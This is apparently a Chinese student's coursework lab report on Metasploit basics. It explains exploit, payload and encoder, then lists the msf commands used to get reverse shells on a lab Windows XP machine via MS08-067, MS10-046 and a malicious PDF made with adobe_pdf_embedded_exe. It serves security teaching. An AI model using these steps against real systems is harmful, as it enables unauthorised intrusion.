20145239杜文超《网络攻防》- MSF基础应用

基础问题回答

1、用自己的话解释什么是exploit,payload,encode?

  • exploit:实现攻击行为的主体,但没有载荷只是一个空壳。没有子弹的枪是很好的比喻。
  • payload:载荷。一般指shellcode,攻击成功后需要运行的东西。
  • encode:编码器。使得我们的攻击中不会出现“坏字符”,也可以通过编码改变特征码,实现免杀。

实验总结与体会

msf仅仅是一个攻击平台,攻击具体的实现还是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤其是对6个主要模块的功能和用途有了深入理解和实践经验。我也深刻的认识到在现实中想要真正攻陷一台靶机还是有难度的,因为本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,所以才会有那么多漏洞让我可以抓住去攻击,现在windows版本不断更新,漏洞补丁的更新速度也越来越快,因此更体现出了0 day漏洞的价值。

实验过程

实验环境配置

攻击机:Kali(IP:192.168.248.128)

靶机:Windows XP SP3(IP:192.168.248.129)

MS08_067漏洞渗透攻击

1、先用search ms08_067指令查询该攻击模块。

2、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。

3、输入set payload generic/shell_reverse_tcp设置一下payload,通过反向连接获取shell。

4、使用show options指令查看需要进行的配置。

5、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。

6、设置完成后再次确认刚才的设置。

7、输入exploit发起攻击。

8、攻击成功,成功获取靶机系统shell。

对浏览器攻击:ms10_046漏洞攻击

1、先利用search ms10_046指令查看可以运用的攻击模块.

2、使用该漏洞进行攻击。

3、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。

4、发起攻击,可以看到,生成了url链接地址。

5、我们使用靶机的IE浏览器登陆一下刚才生成的url地址。

6、发现主机这边已经攻击成功了。

7、使用命令sessions -i 1开始连接,成功得到shell。

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

1、进入文件攻击目录选择一个合适的adobe漏洞。

2、我选择的是adobe_pdf_embedded_exe,use这个漏洞。

3、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp

4、show options查看需要进行哪些配置。

5、设置文件名称5239.pdf,LHOST为攻击者主机IP。

6、再次使用show options检查配置。

7、发起攻击。发现生成了一个名为5239的pdf文件。

8、把攻击主机设置为监听状态,方法和以前的实验类似。

9、将该pdf拷贝到靶机上然后打开。

10、攻击机已经成功获取到靶机shell。

辅助模块的应用:scanner/http/dir_listing

1、先用search了解一下有关scanner/http/dir_listing的相关信息。

2、设置相关参数。

3、run,运行成功。

20145239杜文超《网络攻防》- MSF基础应用的更多相关文章

  1. 20145239杜文超《网络对抗》- Web安全基础实践

    20145239杜文超<网络对抗>- Web安全基础实践 基础问题回答 (1)SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查 ...

  2. 20145239杜文超《网络对抗》- Web基础

    20145239杜文超<网络对抗>- Web基础 基础问题回答 1.什么是表单? 表单是一个包含表单元素的区域. 表单元素是允许用户在表单中(比如:文本域.下拉列表.单选框.复选框等等)输 ...

  3. 20145239杜文超《网络对抗》- shellcode注入&Return-to-libc攻击深入

    20145239杜文超<网络对抗>- shellcode注入&Return-to-libc攻击深入 shellcode基础知识 Shellcode是一段代码,作为数据发送给受攻击服 ...

  4. 20145239 杜文超 实验四 Android开发基础

    20145239实验四 Android开发基础 实验内容 基于Android Studio开发简单的Android应用并部署测试 了解Android组件.布局管理器的使用 掌握Android中事件处理 ...

  5. 20145239杜文超 实验五 Java网络编程

    20145239 实验五 Java网络编程 实验内容 组队,一人服务器,一人客户端. 下载加解密代码,先编译运行代码,一人加密一人解密,适当修改代码. 然后集成代码,一人加密后通过TCP发送,加密使用 ...

  6. 20145239杜文超 《Java程序设计》第10周学习总结

    20145239 <Java程序设计>第10周学习总结 教材学习内容总结 Java的网络编程 网络编程 网络编程就是在两个或两个以上的设备(例如计算机)之间传输数据. 网络概述 1.计算机 ...

  7. 20145239杜文超 《Java程序设计》第8周学习总结

    20145239 <Java程序设计>第8周学习总结 教材学习内容总结 通用API 日志API 1.java.util.logging包提供了日志功能相关类与接口,使用日志的起点是logg ...

  8. 20145239杜文超 《Java程序设计》实验二 Java面向对象程序设计实验报告

    20145239 <Java程序设计>实验二 Java面向对象程序设计实验报告 实验内容 初步掌握单元测试和TDD 理解并掌握面向对象三要素:封装.继承.多态 初步掌握UML建模 熟悉S. ...

  9. 20145239杜文超 《Java程序设计》第4周学习总结

    20145239 <Java程序设计>第4周学习总结 教材学习内容总结 第六章: 继承:避免多个类间重复定义共同行为.即当多个类中存在相同属性和行为时,将这些内容抽取到单独一个类中,那么多 ...

随机推荐

  1. 集合映射中的映射包(使用xml文件)

    如果持久类有List对象,我们可以通过列表或者bag元素在映射文件中映射. 这个包(bag)就像List一样,但它不需要索引元素. 在这里,我们使用论坛的场景: 论坛中一个问题有多个答案. 我们来看看 ...

  2. cv resource

    http://blog.sina.com.cn/s/blog_5086c3e20101kdy5.html

  3. 浅谈DNS

    什么叫域名解析 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站一种服务.IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址.域名解析就是域 ...

  4. 【Unity】基于MVC模式的背包系统 UGUI实现

    前言 本文基于MVC模式,用UGUI初步实现了背包系统. Control层包括了点击和拖拽两种逻辑. 博文首发:http://blog.csdn.net/duzixi 下载地址:https://git ...

  5. Notepad++ 64位 插件管理

    notepad++ 64bit 没有插件管理,如何添加呢? 1.访问https://github.com/bruderstein/nppPluginManager/releases,下载  Plugi ...

  6. 巨蟒python全栈开发django4:url反向解析图解&&模板渲染2

    注意:前端有aaa变量,后端没有aaa变量,存在p标签,但是显示不出来 有p标签,我们可以指定默认值,在没有其他内容的时候 过滤器有60多种,有点多,用到的时候再记和查 结果: 显示是acd 看长度 ...

  7. 学习 Unix 常用命令

    第一个是 man 命令,作用是:"Display system documentation",我是 manual 的缩写.通过这个命令,我们能了解接下来要学习的命令的文档. ls, ...

  8. C# MD5加密与校验 引用

    using System; using System.Security.Cryptography; using System.Text; class Example { // Hash an inpu ...

  9. php无法连接mongodb 3.0问题解决

    1 几个常用的role root mongodb最高权限 userAdmin 自己建立的数据库账号管理权限 read 只读权限 readWrite 可读可写 2 遭遇的梗 为数据库建立了账号,php死 ...

  10. PS导出@3x、@2x、@1x格式的iOS切图神器-Retinize

    Retinize动作下载地址:http://retinize.it/ 使用:ps-载入动作-选中图片-执行动作